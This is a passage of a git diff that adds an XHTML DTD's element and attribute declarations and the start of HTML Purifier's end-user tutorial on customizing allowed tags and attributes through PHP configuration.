+<!ENTITY % fontstyle.basic "tt | i | b | u + | s | strike "> + +<!ENTITY % fontstyle "%fontstyle.basic; | %fontstyle.extra;"> + +<!ENTITY % phrase.extra "sub | sup"> +<!ENTITY % phrase.basic "em | strong | dfn | code | q | + samp | kbd | var | cite | abbr | acronym"> + +<!ENTITY % phrase "%phrase.basic; | %phrase.extra;"> + +<!ENTITY % inline.forms "input | select | textarea | label | button"> + +<!-- these can occur at block or inline level --> +<!ENTITY % misc.inline "ins | del | script"> + +<!-- these can only occur at block level --> +<!ENTITY % misc "noscript | %misc.inline;"> + +<!ENTITY % inline "a | %special; | %fontstyle; | %phrase; | %inline.forms;"> + +<!-- %Inline; covers inline or "text-level" elements --> +<!ENTITY % Inline "(#PCDATA | %inline; | %misc.inline;)*"> + +<!--================== Block level elements ==============================--> + +<!ENTITY % heading "h1|h2|h3|h4|h5|h6"> +<!ENTITY % lists "ul | ol | dl | menu | dir"> +<!ENTITY % blocktext "pre | hr | blockquote | address | center | noframes"> + +<!ENTITY % block + "p | %heading; | div | %lists; | %blocktext; | isindex |fieldset | table"> + +<!-- %Flow; mixes block and inline and is used for list items etc. --> +<!ENTITY % Flow "(#PCDATA | %block; | form | %inline; | %misc;)*"> + +<!--================== Content models for exclusions =====================--> + +<!-- a elements use %Inline; excluding a --> + +<!ENTITY % a.content + "(#PCDATA | %special; | %fontstyle; | %phrase; | %inline.forms; | %misc.inline;)*"> + +<!-- pre uses %Inline excluding img, object, applet, big, small, + font, or basefont --> + +<!ENTITY % pre.content + "(#PCDATA | a | %special.basic; | %fontstyle.basic; | %phrase.basic; | + %inline.forms; | %misc.inline;)*"> + +<!-- form uses %Flow; excluding form --> + +<!ENTITY % form.content "(#PCDATA | %block; | %inline; | %misc;)*"> + +<!-- button uses %Flow; but excludes a, form, form controls, iframe --> + +<!ENTITY % button.content + "(#PCDATA | p | %heading; | div | %lists; | %blocktext; | + table | br | span | bdo | object | applet | img | map | + %fontstyle; | %phrase; | %misc;)*"> + +<!--================ Document Structure ==================================--> + +<!-- the namespace URI designates the document profile --> + +<!ELEMENT html (head, body)> +<!ATTLIST html + %i18n; + id ID #IMPLIED + xmlns %URI; #FIXED 'http://www.w3.org/1999/xhtml' + > + +<!--================ Document Head =======================================--> + +<!ENTITY % head.misc "(script|style|meta|link|object|isindex)*"> + +<!-- content model is %head.misc; combined with a single + title and an optional base element in any order --> + +<!ELEMENT head (%head.misc;, + ((title, %head.misc;, (base, %head.misc;)?) | + (base, %head.misc;, (title, %head.misc;))))> + +<!ATTLIST head + %i18n; + id ID #IMPLIED + profile %URI; #IMPLIED + > + +<!-- The title element is not considered part of the flow of text. + It should be displayed, for example as the page header or + window title. Exactly one title is required per document. + --> +<!ELEMENT title (#PCDATA)> +<!ATTLIST title + %i18n; + id ID #IMPLIED + > + +<!-- document base URI --> + +<!ELEMENT base EMPTY> +<!ATTLIST base + id ID #IMPLIED + href %URI; #IMPLIED + target %FrameTarget; #IMPLIED + > + +<!-- generic metainformation --> +<!ELEMENT meta EMPTY> +<!ATTLIST meta + %i18n; + id ID #IMPLIED + http-equiv CDATA #IMPLIED + name CDATA #IMPLIED + content CDATA #REQUIRED + scheme CDATA #IMPLIED + > + +<!-- + Relationship values can be used in principle: + + a) for document specific toolbars/menus when used + with the link element in document head e.g. + start, contents, previous, next, index, end, help + b) to link to a separate style sheet (rel="stylesheet") + c) to make a link to a script (rel="script") + d) by stylesheets to control how collections of + html nodes are rendered into printed documents + e) to make a link to a printable version of this document + e.g. a PostScript or PDF version (rel="alternate" media="print") +--> + +<!ELEMENT link EMPTY> +<!ATTLIST link + %attrs; + charset %Charset; #IMPLIED + href %URI; #IMPLIED + hreflang %LanguageCode; #IMPLIED + type %ContentType; #IMPLIED + rel %LinkTypes; #IMPLIED + rev %LinkTypes; #IMPLIED + media %MediaDesc; #IMPLIED + target %FrameTarget; #IMPLIED + > + +<!-- style info, which may include CDATA sections --> +<!ELEMENT style (#PCDATA)> +<!ATTLIST style + %i18n; + id ID #IMPLIED + type %ContentType; #REQUIRED + media %MediaDesc; #IMPLIED + title %Text; #IMPLIED + xml:space (preserve) #FIXED 'preserve' + > + +<!-- script statements, which may include CDATA sections --> +<!ELEMENT script (#PCDATA)> +<!ATTLIST script + id ID #IMPLIED + charset %Charset; #IMPLIED + type %ContentType; #REQUIRED + language CDATA #IMPLIED + src %URI; #IMPLIED + defer (defer) #IMPLIED + xml:space (preserve) #FIXED 'preserve' + > + +<!-- alternate content container for non script-based rendering --> + +<!ELEMENT noscript %Flow;> +<!ATTLIST noscript + %attrs; + > + +<!--======================= Frames =======================================--> + +<!-- inline subwindow --> + +<!ELEMENT iframe %Flow;> +<!ATTLIST iframe + %coreattrs; + longdesc %URI; #IMPLIED + name NMTOKEN #IMPLIED + src %URI; #IMPLIED + frameborder (1|0) "1" + marginwidth %Pixels; #IMPLIED + marginheight %Pixels; #IMPLIED + scrolling (yes|no|auto) "auto" + align %ImgAlign; #IMPLIED + height %Length; #IMPLIED + width %Length; #IMPLIED + > + +<!-- alternate content container for non frame-based rendering --> + +<!ELEMENT noframes %Flow;> +<!ATTLIST noframes + %attrs; + > + +<!--=================== Document Body ====================================--> + +<!ELEMENT body %Flow;> +<!ATTLIST body + %attrs; + onload %Script; #IMPLIED + onunload %Script; #IMPLIED + background %URI; #IMPLIED + bgcolor %Color; #IMPLIED + text %Color; #IMPLIED + link %Color; #IMPLIED + vlink %Color; #IMPLIED + alink %Color; #IMPLIED + > + +<!ELEMENT div %Flow;> <!-- generic language/style container --> +<!ATTLIST div + %attrs; + %TextAlign; + > + +<!--=================== Paragraphs =======================================--> + +<!ELEMENT p %Inline;> +<!ATTLIST p + %attrs; + %TextAlign; + > + +<!--=================== Headings =========================================--> + +<!-- + There are six levels of headings from h1 (the most important) + to h6 (the least important). +--> + +<!ELEMENT h1 %Inline;> +<!ATTLIST h1 + %attrs; + %TextAlign; + > + +<!ELEMENT h2 %Inline;> +<!ATTLIST h2 + %attrs; + %TextAlign; + > + +<!ELEMENT h3 %Inline;> +<!ATTLIST h3 + %attrs; + %TextAlign; + > + +<!ELEMENT h4 %Inline;> +<!ATTLIST h4 + %attrs; + %TextAlign; + > + +<!ELEMENT h5 %Inline;> +<!ATTLIST h5 + %attrs; + %TextAlign; + > + +<!ELEMENT h6 %Inline;> +<!ATTLIST h6 + %attrs; + %TextAlign; + > + +<!--=================== Lists ============================================--> + +<!-- Unordered list bullet styles --> + +<!ENTITY % ULStyle "(disc|square|circle)"> + +<!-- Unordered list --> + +<!ELEMENT ul (li)+> +<!ATTLIST ul + %attrs; + type %ULStyle; #IMPLIED + compact (compact) #IMPLIED + > + +<!-- Ordered list numbering style + + 1 arabic numbers 1, 2, 3, ... + a lower alpha a, b, c, ... + A upper alpha A, B, C, ... + i lower roman i, ii, iii, ... + I upper roman I, II, III, ... + + The style is applied to the sequence number which by default + is reset to 1 for the first list item in an ordered list. +--> +<!ENTITY % OLStyle "CDATA"> + +<!-- Ordered (numbered) list --> + +<!ELEMENT ol (li)+> +<!ATTLIST ol + %attrs; + type %OLStyle; #IMPLIED + compact (compact) #IMPLIED + start %Number; #IMPLIED + > + +<!-- single column list (DEPRECATED) --> +<!ELEMENT menu (li)+> +<!ATTLIST menu + %attrs; + compact (compact) #IMPLIED + > + +<!-- multiple column list (DEPRECATED) --> +<!ELEMENT dir (li)+> +<!ATTLIST dir + %attrs; + compact (compact) #IMPLIED + > + +<!-- LIStyle is constrained to: "(%ULStyle;|%OLStyle;)" --> +<!ENTITY % LIStyle "CDATA"> + +<!-- list item --> + +<!ELEMENT li %Flow;> +<!ATTLIST li + %attrs; + type %LIStyle; #IMPLIED + value %Number; #IMPLIED + > + +<!-- definition lists - dt for term, dd for its definition --> + +<!ELEMENT dl (dt|dd)+> +<!ATTLIST dl + %attrs; + compact (compact) #IMPLIED + > + +<!ELEMENT dt %Inline;> +<!ATTLIST dt + %attrs; + > + +<!ELEMENT dd %Flow;> +<!ATTLIST dd + %attrs; + > + +<!--=================== Address ==========================================--> + +<!-- information on author --> + +<!ELEMENT address (#PCDATA | %inline; | %misc.inline; | p)*> +<!ATTLIST address + %attrs; + > + +<!--=================== Horizontal Rule ==================================--> + +<!ELEMENT hr EMPTY> +<!ATTLIST hr + %attrs; + align (left|center|right) #IMPLIED + noshade (noshade) #IMPLIED + size %Pixels; #IMPLIED + width %Length; #IMPLIED + > + +<!--=================== Preformatted Text ================================--> + +<!-- content is %Inline; excluding + "img|object|applet|big|small|sub|sup|font|basefont" --> + +<!ELEMENT pre %pre.content;> +<!ATTLIST pre + %attrs; + width %Number; #IMPLIED + xml:space (preserve) #FIXED 'preserve' + > + +<!--=================== Block-like Quotes ================================--> + +<!ELEMENT blockquote %Flow;> +<!ATTLIST blockquote + %attrs; + cite %URI; #IMPLIED + > + +<!--=================== Text alignment ===================================--> + +<!-- center content --> +<!ELEMENT center %Flow;> +<!ATTLIST center + %attrs; + > + +<!--=================== Inserted/Deleted Text ============================--> + +<!-- + ins/del are allowed in block and inline content, but its + inappropriate to include block content within an ins element + occurring in inline content. +--> +<!ELEMENT ins %Flow;> +<!ATTLIST ins + %attrs; + cite %URI; #IMPLIED + datetime %Datetime; #IMPLIED + > + +<!ELEMENT del %Flow;> +<!ATTLIST del + %attrs; + cite %URI; #IMPLIED + datetime %Datetime; #IMPLIED + > + +<!--================== The Anchor Element ================================--> + +<!-- content is %Inline; except that anchors shouldn't be nested --> + +<!ELEMENT a %a.content;> +<!ATTLIST a + %attrs; + %focus; + charset %Charset; #IMPLIED + type %ContentType; #IMPLIED + name NMTOKEN #IMPLIED + href %URI; #IMPLIED + hreflang %LanguageCode; #IMPLIED + rel %LinkTypes; #IMPLIED + rev %LinkTypes; #IMPLIED + shape %Shape; "rect" + coords %Coords; #IMPLIED + target %FrameTarget; #IMPLIED + > + +<!--===================== Inline Elements ================================--> + +<!ELEMENT span %Inline;> <!-- generic language/style container --> +<!ATTLIST span + %attrs; + > + +<!ELEMENT bdo %Inline;> <!-- I18N BiDi over-ride --> +<!ATTLIST bdo + %coreattrs; + %events; + lang %LanguageCode; #IMPLIED + xml:lang %LanguageCode; #IMPLIED + dir (ltr|rtl) #REQUIRED + > + +<!ELEMENT br EMPTY> <!-- forced line break --> +<!ATTLIST br + %coreattrs; + clear (left|all|right|none) "none" + > + +<!ELEMENT em %Inline;> <!-- emphasis --> +<!ATTLIST em %attrs;> + +<!ELEMENT strong %Inline;> <!-- strong emphasis --> +<!ATTLIST strong %attrs;> + +<!ELEMENT dfn %Inline;> <!-- definitional --> +<!ATTLIST dfn %attrs;> + +<!ELEMENT code %Inline;> <!-- program code --> +<!ATTLIST code %attrs;> + +<!ELEMENT samp %Inline;> <!-- sample --> +<!ATTLIST samp %attrs;> + +<!ELEMENT kbd %Inline;> <!-- something user would type --> +<!ATTLIST kbd %attrs;> + +<!ELEMENT var %Inline;> <!-- variable --> +<!ATTLIST var %attrs;> + +<!ELEMENT cite %Inline;> <!-- citation --> +<!ATTLIST cite %attrs;> + +<!ELEMENT abbr %Inline;> <!-- abbreviation --> +<!ATTLIST abbr %attrs;> + +<!ELEMENT acronym %Inline;> <!-- acronym --> +<!ATTLIST acronym %attrs;> + +<!ELEMENT q %Inline;> <!-- inlined quote --> +<!ATTLIST q + %attrs; + cite %URI; #IMPLIED + > + +<!ELEMENT sub %Inline;> <!-- subscript --> +<!ATTLIST sub %attrs;> + +<!ELEMENT sup %Inline;> <!-- superscript --> +<!ATTLIST sup %attrs;> + +<!ELEMENT tt %Inline;> <!-- fixed pitch font --> +<!ATTLIST tt %attrs;> + +<!ELEMENT i %Inline;> <!-- italic font --> +<!ATTLIST i %attrs;> + +<!ELEMENT b %Inline;> <!-- bold font --> +<!ATTLIST b %attrs;> + +<!ELEMENT big %Inline;> <!-- bigger font --> +<!ATTLIST big %attrs;> + +<!ELEMENT small %Inline;> <!-- smaller font --> +<!ATTLIST small %attrs;> + +<!ELEMENT u %Inline;> <!-- underline --> +<!ATTLIST u %attrs;> + +<!ELEMENT s %Inline;> <!-- strike-through --> +<!ATTLIST s %attrs;> + +<!ELEMENT strike %Inline;> <!-- strike-through --> +<!ATTLIST strike %attrs;> + +<!ELEMENT basefont EMPTY> <!-- base font size --> +<!ATTLIST basefont + id ID #IMPLIED + size CDATA #REQUIRED + color %Color; #IMPLIED + face CDATA #IMPLIED + > + +<!ELEMENT font %Inline;> <!-- local change to font --> +<!ATTLIST font + %coreattrs; + %i18n; + size CDATA #IMPLIED + color %Color; #IMPLIED + face CDATA #IMPLIED + > + +<!--==================== Object ======================================--> +<!-- + object is used to embed objects as part of HTML pages. + param elements should precede other content. Parameters + can also be expressed as attribute/value pairs on the + object element itself when brevity is desired. +--> + +<!ELEMENT object (#PCDATA | param | %block; | form | %inline; | %misc;)*> +<!ATTLIST object + %attrs; + declare (declare) #IMPLIED + classid %URI; #IMPLIED + codebase %URI; #IMPLIED + data %URI; #IMPLIED + type %ContentType; #IMPLIED + codetype %ContentType; #IMPLIED + archive %UriList; #IMPLIED + standby %Text; #IMPLIED + height %Length; #IMPLIED + width %Length; #IMPLIED + usemap %URI; #IMPLIED + name NMTOKEN #IMPLIED + tabindex %Number; #IMPLIED + align %ImgAlign; #IMPLIED + border %Pixels; #IMPLIED + hspace %Pixels; #IMPLIED + vspace %Pixels; #IMPLIED + > + +<!-- + param is used to supply a named property value. + In XML it would seem natural to follow RDF and support an + abbreviated syntax where the param elements are replaced + by attribute value pairs on the object start tag. +--> +<!ELEMENT param EMPTY> +<!ATTLIST param + id ID #IMPLIED + name CDATA #REQUIRED + value CDATA #IMPLIED + valuetype (data|ref|object) "data" + type %ContentType; #IMPLIED + > + +<!--=================== Java applet ==================================--> +<!-- + One of code or object attributes must be present. + Place param elements before other content. +--> +<!ELEMENT applet (#PCDATA | param | %block; | form | %inline; | %misc;)*> +<!ATTLIST applet + %coreattrs; + codebase %URI; #IMPLIED + archive CDATA #IMPLIED + code CDATA #IMPLIED + object CDATA #IMPLIED + alt %Text; #IMPLIED + name NMTOKEN #IMPLIED + width %Length; #REQUIRED + height %Length; #REQUIRED + align %ImgAlign; #IMPLIED + hspace %Pixels; #IMPLIED + vspace %Pixels; #IMPLIED + > + +<!--=================== Images ===========================================--> + +<!-- + To avoid accessibility problems for people who aren't + able to see the image, you should provide a text + description using the alt and longdesc attributes. + In addition, avoid the use of server-side image maps. +--> + +<!ELEMENT img EMPTY> +<!ATTLIST img + %attrs; + src %URI; #REQUIRED + alt %Text; #REQUIRED + name NMTOKEN #IMPLIED + longdesc %URI; #IMPLIED + height %Length; #IMPLIED + width %Length; #IMPLIED + usemap %URI; #IMPLIED + ismap (ismap) #IMPLIED + align %ImgAlign; #IMPLIED + border %Length; #IMPLIED + hspace %Pixels; #IMPLIED + vspace %Pixels; #IMPLIED + > + +<!-- usemap points to a map element which may be in this document + or an external document, although the latter is not widely supported --> + +<!--================== Client-side image maps ============================--> + +<!-- These can be placed in the same document or grouped in a + separate document although this isn't yet widely supported --> + +<!ELEMENT map ((%block; | form | %misc;)+ | area+)> +<!ATTLIST map + %i18n; + %events; + id ID #REQUIRED + class CDATA #IMPLIED + style %StyleSheet; #IMPLIED + title %Text; #IMPLIED + name CDATA #IMPLIED + > + +<!ELEMENT area EMPTY> +<!ATTLIST area + %attrs; + %focus; + shape %Shape; "rect" + coords %Coords; #IMPLIED + href %URI; #IMPLIED + nohref (nohref) #IMPLIED + alt %Text; #REQUIRED + target %FrameTarget; #IMPLIED + > + +<!--================ Forms ===============================================--> + +<!ELEMENT form %form.content;> <!-- forms shouldn't be nested --> + +<!ATTLIST form + %attrs; + action %URI; #REQUIRED + method (get|post) "get" + name NMTOKEN #IMPLIED + enctype %ContentType; "application/x-www-form-urlencoded" + onsubmit %Script; #IMPLIED + onreset %Script; #IMPLIED + accept %ContentTypes; #IMPLIED + accept-charset %Charsets; #IMPLIED + target %FrameTarget; #IMPLIED + > + +<!-- + Each label must not contain more than ONE field + Label elements shouldn't be nested. +--> +<!ELEMENT label %Inline;> +<!ATTLIST label + %attrs; + for IDREF #IMPLIED + accesskey %Character; #IMPLIED + onfocus %Script; #IMPLIED + onblur %Script; #IMPLIED + > + +<!ENTITY % InputType + "(text | password | checkbox | + radio | submit | reset | + file | hidden | image | button)" + > + +<!-- the name attribute is required for all but submit & reset --> + +<!ELEMENT input EMPTY> <!-- form control --> +<!ATTLIST input + %attrs; + %focus; + type %InputType; "text" + name CDATA #IMPLIED + value CDATA #IMPLIED + checked (checked) #IMPLIED + disabled (disabled) #IMPLIED + readonly (readonly) #IMPLIED + size CDATA #IMPLIED + maxlength %Number; #IMPLIED + src %URI; #IMPLIED + alt CDATA #IMPLIED + usemap %URI; #IMPLIED + onselect %Script; #IMPLIED + onchange %Script; #IMPLIED + accept %ContentTypes; #IMPLIED + align %ImgAlign; #IMPLIED + > + +<!ELEMENT select (optgroup|option)+> <!-- option selector --> +<!ATTLIST select + %attrs; + name CDATA #IMPLIED + size %Number; #IMPLIED + multiple (multiple) #IMPLIED + disabled (disabled) #IMPLIED + tabindex %Number; #IMPLIED + onfocus %Script; #IMPLIED + onblur %Script; #IMPLIED + onchange %Script; #IMPLIED + > + +<!ELEMENT optgroup (option)+> <!-- option group --> +<!ATTLIST optgroup + %attrs; + disabled (disabled) #IMPLIED + label %Text; #REQUIRED + > + +<!ELEMENT option (#PCDATA)> <!-- selectable choice --> +<!ATTLIST option + %attrs; + selected (selected) #IMPLIED + disabled (disabled) #IMPLIED + label %Text; #IMPLIED + value CDATA #IMPLIED + > + +<!ELEMENT textarea (#PCDATA)> <!-- multi-line text field --> +<!ATTLIST textarea + %attrs; + %focus; + name CDATA #IMPLIED + rows %Number; #REQUIRED + cols %Number; #REQUIRED + disabled (disabled) #IMPLIED + readonly (readonly) #IMPLIED + onselect %Script; #IMPLIED + onchange %Script; #IMPLIED + > + +<!-- + The fieldset element is used to group form fields. + Only one legend element should occur in the content + and if present should only be preceded by whitespace. +--> +<!ELEMENT fieldset (#PCDATA | legend | %block; | form | %inline; | %misc;)*> +<!ATTLIST fieldset + %attrs; + > + +<!ENTITY % LAlign "(top|bottom|left|right)"> + +<!ELEMENT legend %Inline;> <!-- fieldset label --> +<!ATTLIST legend + %attrs; + accesskey %Character; #IMPLIED + align %LAlign; #IMPLIED + > + +<!-- + Content is %Flow; excluding a, form, form controls, iframe +--> +<!ELEMENT button %button.content;> <!-- push button --> +<!ATTLIST button + %attrs; + %focus; + name CDATA #IMPLIED + value CDATA #IMPLIED + type (button|submit|reset) "submit" + disabled (disabled) #IMPLIED + > + +<!-- single-line text input control (DEPRECATED) --> +<!ELEMENT isindex EMPTY> +<!ATTLIST isindex + %coreattrs; + %i18n; + prompt %Text; #IMPLIED + > + +<!--======================= Tables =======================================--> + +<!-- Derived from IETF HTML table standard, see [RFC1942] --> + +<!-- + The border attribute sets the thickness of the frame around the + table. The default units are screen pixels. + + The frame attribute specifies which parts of the frame around + the table should be rendered. The values are not the same as + CALS to avoid a name clash with the valign attribute. +--> +<!ENTITY % TFrame "(void|above|below|hsides|lhs|rhs|vsides|box|border)"> + +<!-- + The rules attribute defines which rules to draw between cells: + + If rules is absent then assume: + "none" if border is absent or border="0" otherwise "all" +--> + +<!ENTITY % TRules "(none | groups | rows | cols | all)"> + +<!-- horizontal placement of table relative to document --> +<!ENTITY % TAlign "(left|center|right)"> + +<!-- horizontal alignment attributes for cell contents + + char alignment char, e.g. char=':' + charoff offset for alignment char +--> +<!ENTITY % cellhalign + "align (left|center|right|justify|char) #IMPLIED + char %Character; #IMPLIED + charoff %Length; #IMPLIED" + > + +<!-- vertical alignment attributes for cell contents --> +<!ENTITY % cellvalign + "valign (top|middle|bottom|baseline) #IMPLIED" + > + +<!ELEMENT table + (caption?, (col*|colgroup*), thead?, tfoot?, (tbody+|tr+))> +<!ELEMENT caption %Inline;> +<!ELEMENT thead (tr)+> +<!ELEMENT tfoot (tr)+> +<!ELEMENT tbody (tr)+> +<!ELEMENT colgroup (col)*> +<!ELEMENT col EMPTY> +<!ELEMENT tr (th|td)+> +<!ELEMENT th %Flow;> +<!ELEMENT td %Flow;> + +<!ATTLIST table + %attrs; + summary %Text; #IMPLIED + width %Length; #IMPLIED + border %Pixels; #IMPLIED + frame %TFrame; #IMPLIED + rules %TRules; #IMPLIED + cellspacing %Length; #IMPLIED + cellpadding %Length; #IMPLIED + align %TAlign; #IMPLIED + bgcolor %Color; #IMPLIED + > + +<!ENTITY % CAlign "(top|bottom|left|right)"> + +<!ATTLIST caption + %attrs; + align %CAlign; #IMPLIED + > + +<!-- +colgroup groups a set of col elements. It allows you to group +several semantically related columns together. +--> +<!ATTLIST colgroup + %attrs; + span %Number; "1" + width %MultiLength; #IMPLIED + %cellhalign; + %cellvalign; + > + +<!-- + col elements define the alignment properties for cells in + one or more columns. + + The width attribute specifies the width of the columns, e.g. + + width=64 width in screen pixels + width=0.5* relative width of 0.5 + + The span attribute causes the attributes of one + col element to apply to more than one column. +--> +<!ATTLIST col + %attrs; + span %Number; "1" + width %MultiLength; #IMPLIED + %cellhalign; + %cellvalign; + > + +<!-- + Use thead to duplicate headers when breaking table + across page boundaries, or for static headers when + tbody sections are rendered in scrolling panel. + + Use tfoot to duplicate footers when breaking table + across page boundaries, or for static footers when + tbody sections are rendered in scrolling panel. + + Use multiple tbody sections when rules are needed + between groups of table rows. +--> +<!ATTLIST thead + %attrs; + %cellhalign; + %cellvalign; + > + +<!ATTLIST tfoot + %attrs; + %cellhalign; + %cellvalign; + > + +<!ATTLIST tbody + %attrs; + %cellhalign; + %cellvalign; + > + +<!ATTLIST tr + %attrs; + %cellhalign; + %cellvalign; + bgcolor %Color; #IMPLIED + > + +<!-- Scope is simpler than headers attribute for common tables --> +<!ENTITY % Scope "(row|col|rowgroup|colgroup)"> + +<!-- th is for headers, td for data and for cells acting as both --> + +<!ATTLIST th + %attrs; + abbr %Text; #IMPLIED + axis CDATA #IMPLIED + headers IDREFS #IMPLIED + scope %Scope; #IMPLIED + rowspan %Number; "1" + colspan %Number; "1" + %cellhalign; + %cellvalign; + nowrap (nowrap) #IMPLIED + bgcolor %Color; #IMPLIED + width %Length; #IMPLIED + height %Length; #IMPLIED + > + +<!ATTLIST td + %attrs; + abbr %Text; #IMPLIED + axis CDATA #IMPLIED + headers IDREFS #IMPLIED + scope %Scope; #IMPLIED + rowspan %Number; "1" + colspan %Number; "1" + %cellhalign; + %cellvalign; + nowrap (nowrap) #IMPLIED + bgcolor %Color; #IMPLIED + width %Length; #IMPLIED + height %Length; #IMPLIED + > + diff --git a/lib/htmlpurifier/docs/enduser-customize.html b/lib/htmlpurifier/docs/enduser-customize.html new file mode 100644 index 000000000..7e1ffa260 --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-customize.html @@ -0,0 +1,850 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Tutorial for customizing HTML Purifier's tag and attribute sets." /> +<link rel="stylesheet" type="text/css" href="style.css" /> + +<title>Customize - HTML Purifier</title> + +</head><body> + +<h1 class="subtitled">Customize!</h1> +<div class="subtitle">HTML Purifier is a Swiss-Army Knife</div> + +<div id="filing">Filed under End-User</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p> + HTML Purifier has this quirk where if you try to allow certain elements or + attributes, HTML Purifier will tell you that it's not supported, and that + you should go to the forums to find out how to implement it. Well, this + document is how to implement elements and attributes which HTML Purifier + doesn't support out of the box. +</p> + +<h2>Is it necessary?</h2> + +<p> + Before we even write any code, it is paramount to consider whether or + not the code we're writing is necessary or not. HTML Purifier, by default, + contains a large set of elements and attributes: large enough so that + <em>any</em> element or attribute in XHTML 1.0 or 1.1 (and its HTML variants) + that can be safely used by the general public is implemented. +</p> + +<p> + So what needs to be implemented? (Feel free to skip this section if + you know what you want). +</p> + +<h3>XHTML 1.0</h3> + +<p> + All of the modules listed below are based off of the + <a href="http://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of + XHTML</a>, which, while technically for XHTML 1.1, is quite a useful + resource. +</p> + +<ul> + <li>Structure</li> + <li>Frames</li> + <li>Applets (deprecated)</li> + <li>Forms</li> + <li>Image maps</li> + <li>Objects</li> + <li>Frames</li> + <li>Events</li> + <li>Meta-information</li> + <li>Style sheets</li> + <li>Link (not hypertext)</li> + <li>Base</li> + <li>Name</li> +</ul> + +<p> + If you don't recognize it, you probably don't need it. But the curious + can look all of these modules up in the above-mentioned document. Note + that inline scripting comes packaged with HTML Purifier (more on this + later). +</p> + +<h3>XHTML 1.1</h3> + +<p> + As of HTMLPurifier 2.1.0, we have implemented the + <a href="http://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>, + which defines a set of tags + for publishing short annotations for text, used mostly in Japanese + and Chinese school texts, but applicable for positioning any text (not + limited to translations) above or below other corresponding text. +</p> + +<h3>HTML 5</h3> + +<p> + <a href="http://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a> + is a fork of HTML 4.01 by WHATWG, who believed that XHTML 2.0 was headed + in the wrong direction. It too is a working draft, and may change + drastically before publication, but it should be noted that the + <code>canvas</code> tag has been implemented by many browser vendors. +</p> + +<h3>Proprietary</h3> + +<p> + There are a number of proprietary tags still in the wild. Many of them + have been documented in <a href="ref-proprietary-tags.txt">ref-proprietary-tags.txt</a>, + but there is currently no implementation for any of them. +</p> + +<h3>Extensions</h3> + +<p> + There are also a number of other XML languages out there that can + be embedded in HTML documents: two of the most popular are MathML and + SVG, and I frequently get requests to implement these. But they are + expansive, comprehensive specifications, and it would take far too long + to implement them <em>correctly</em> (most systems I've seen go as far + as whitelisting tags and no further; come on, what about nesting!) +</p> + +<p> + Word of warning: HTML Purifier is currently <em>not</em> namespace + aware. +</p> + +<h2>Giving back</h2> + +<p> + As you may imagine from the details above (don't be abashed if you didn't + read it all: a glance over would have done), there's quite a bit that + HTML Purifier doesn't implement. Recent architectural changes have + allowed HTML Purifier to implement elements and attributes that are not + safe! Don't worry, they won't be activated unless you set %HTML.Trusted + to true, but they certainly help out users who need to put, say, forms + on their page and don't want to go through the trouble of reading this + and implementing it themself. +</p> + +<p> + So any of the above that you implement for your own application could + help out some other poor sap on the other side of the globe. Help us + out, and send back code so that it can be hammered into a module and + released with the core. Any code would be greatly appreciated! +</p> + +<h2>And now...</h2> + +<p> + Enough philosophical talk, time for some code: +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); +$config->set('HTML.DefinitionRev', 1); +if ($def = $config->maybeGetRawHTMLDefinition()) { + // our code will go here +}</pre> + +<p> + Assuming that HTML Purifier has already been properly loaded (hint: + include <code>HTMLPurifier.auto.php</code>), this code will set up + the environment that you need to start customizing the HTML definition. + What's going on? +</p> + +<ul> + <li> + The first three lines are regular configuration code: + <ul> + <li> + %HTML.DefinitionID is set to a unique identifier for your + custom HTML definition. This prevents it from clobbering + other custom definitions on the same installation. + </li> + <li> + %HTML.DefinitionRev is a revision integer of your HTML + definition. Because HTML definitions are cached, you'll need + to increment this whenever you make a change in order to flush + the cache. + </li> + </ul> + </li> + <li> + The fourth line retrieves a raw <code>HTMLPurifier_HTMLDefinition</code> + object that we will be tweaking. Interestingly enough, we have + placed it in an if block: this is because + <code>maybeGetRawHTMLDefinition</code>, as its name suggests, may + return a NULL, in which case we should skip doing any + initialization. This, in fact, will correspond to when our fully + customized object is already in the cache. + </li> +</ul> + +<h2>Turn off caching</h2> + +<p> + To make development easier, we're going to temporarily turn off + definition caching: +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); +$config->set('HTML.DefinitionRev', 1); +<strong>$config->set('Cache.DefinitionImpl', null); // TODO: remove this later!</strong> +$def = $config->getHTMLDefinition(true);</pre> + +<p> + A few things should be mentioned about the caching mechanism before + we move on. For performance reasons, HTML Purifier caches generated + <code>HTMLPurifier_Definition</code> objects in serialized files + stored (by default) in <code>library/HTMLPurifier/DefinitionCache/Serializer</code>. + A lot of processing is done in order to create these objects, so it + makes little sense to repeat the same processing over and over again + whenever HTML Purifier is called. +</p> + +<p> + In order to identify a cache entry, HTML Purifier uses three variables: + the library's version number, the value of %HTML.DefinitionRev and + a serial of relevant configuration. Whenever any of these changes, + a new HTML definition is generated. Notice that there is no way + for the definition object to track changes to customizations: here, it + is up to you to supply appropriate information to DefinitionID and + DefinitionRev. +</p> + +<h2 id="addAttribute">Add an attribute</h2> + +<p> + For this example, we're going to implement the <code>target</code> attribute found + on <code>a</code> elements. To implement an attribute, we have to + ask a few questions: +</p> + +<ol> + <li>What element is it found on?</li> + <li>What is its name?</li> + <li>Is it required or optional?</li> + <li>What are valid values for it?</li> +</ol> + +<p> + The first three are easy: the element is <code>a</code>, the attribute + is <code>target</code>, and it is not a required attribute. (If it + was required, we'd need to append an asterisk to the attribute name, + you'll see an example of this in the addElement() example). +</p> + +<p> + The last question is a little trickier. + Lets allow the special values: _blank, _self, _target and _top. + The form of this is called an <strong>enumeration</strong>, a list of + valid values, although only one can be used at a time. To translate + this into code form, we write: +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); 